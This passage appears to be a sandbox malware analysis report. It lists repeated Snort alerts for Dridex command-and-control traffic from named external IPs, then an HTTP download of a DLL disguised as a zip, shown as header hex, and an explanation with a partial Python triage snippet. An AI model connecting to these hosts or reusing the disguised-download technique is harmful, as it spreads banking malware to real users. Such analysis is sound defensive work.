Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49190
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49192
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49194
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49198
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49202
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49204
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49206
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49211
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49213
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49214
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49220
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49221
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49223
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49229
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49230
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49235
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49237
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49238
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49239
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49241
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49247
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49250
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49249
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49251
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49259
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49263
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49262
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49265
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49268
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49273
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49275
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49277
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49279
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49281
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49282
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49284
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49286
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49290
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49298
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49296
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49300
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic | Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49306
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49318
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49317
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49320
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49321
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49322
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49325
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 69.164.207.140:3388
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 198.57.200.100:3786
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Thu, 21 Jan 2021 15:03:27 GMT
Server: Apache
Last-Modified: Sat, 19 May 2018 08:09:45 GMT
Accept-Ranges: bytes
Content-Length: 856064
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/zip
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2b f5 15 8c 6f 94 7b df 6f 94 7b df 6f 94 7b df 0a f2 78 de 62 94 7b df 0a f2 7e de e4 94 7b df 0a f2 7f de 78 94 7b df a4 fb 7e de 4d 94 7b df a4 fb 7f de 7f 94 7b df a4 fb 78 de 79 94 7b df db 08 94 df 6a 94 7b df 6f 94 7a df 3b 94 7b df a4 fb 72 de 6e 94 7b df a4 fb 7b de 6e 94 7b df a4 fb 84 df 6e 94 7b df a4 fb 79 de 6e 94 7b df 52 69 63 68 6f 94 7b df 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 df 94 d5 5d 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1a 00 74 07 00 00 e4 06 00 00 00 00 00 08 d2 05 00 00 10 00 00 00 90 07 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 0e 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 df 0c 00 64 00 00 00 34 e0 0c 00 50 00 00 00 00 50 0e 00 08 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0e 00 08 27 00 00 7c bb 0c 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 bb 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 72 07 00 00 10 00 00 00 74 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 58 05 00 00 90 07 00 00 5a 05 00 00 78 07 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 5b 01 00 00 f0 0c 00 00 10 00 00 00 d2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 05 00 00 00 50 0e 00 00 06 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 27 00 00 00 60 0e 00 00 28 00 00 00 e8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
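The response above is the detail behind the "Drops files with a non-matching file extension" and "Downloads executable code via HTTP" verdicts: the server says Content-Type: application/zip for /hknmwj.zip, but the body starts with 4d 5a (MZ), the PE signature sits at e_lfanew 0x100, the COFF Characteristics word 0x2102 marks the image as a DLL (hence the later regsvr32.exe loads), and the section table ends at .reloc (PointerToRawData 0xCE800 + SizeOfRawData 0x2800 = 0xD1000 = 856064), exactly the advertised Content-Length. The TimeDateStamp 0x5dd594df also decodes to November 2019, after the Last-Modified header's 2018 date, so that header carries no information about the payload. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds a stand-in for the first bytes of the body from the values visible in the hex dump (layout constructed with struct; fields the parser does not read are left zero) and then runs the declared-type versus magic check a triage script would run on the real download. The content-type and extension maps are assumptions.

```python
import struct
from datetime import datetime, timezone
from typing import Optional

IMAGE_FILE_DLL = 0x2000


def build_sample_pe_header() -> bytes:
    """Constructed stand-in for the start of the downloaded body. Field values are
    read off the report's 'Data Raw' dump; the layout is rebuilt, not copied."""
    dos = bytearray(0x100)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x100)                        # e_lfanew
    dos[0x40:0x4E] = bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")   # DOS stub code
    dos[0x4E:0x4E + 39] = b"This program cannot be run in DOS mode."
    # COFF header: Machine i386, 5 sections, TimeDateStamp, SizeOfOptionalHeader 0xE0,
    # Characteristics 0x2102 (EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL)
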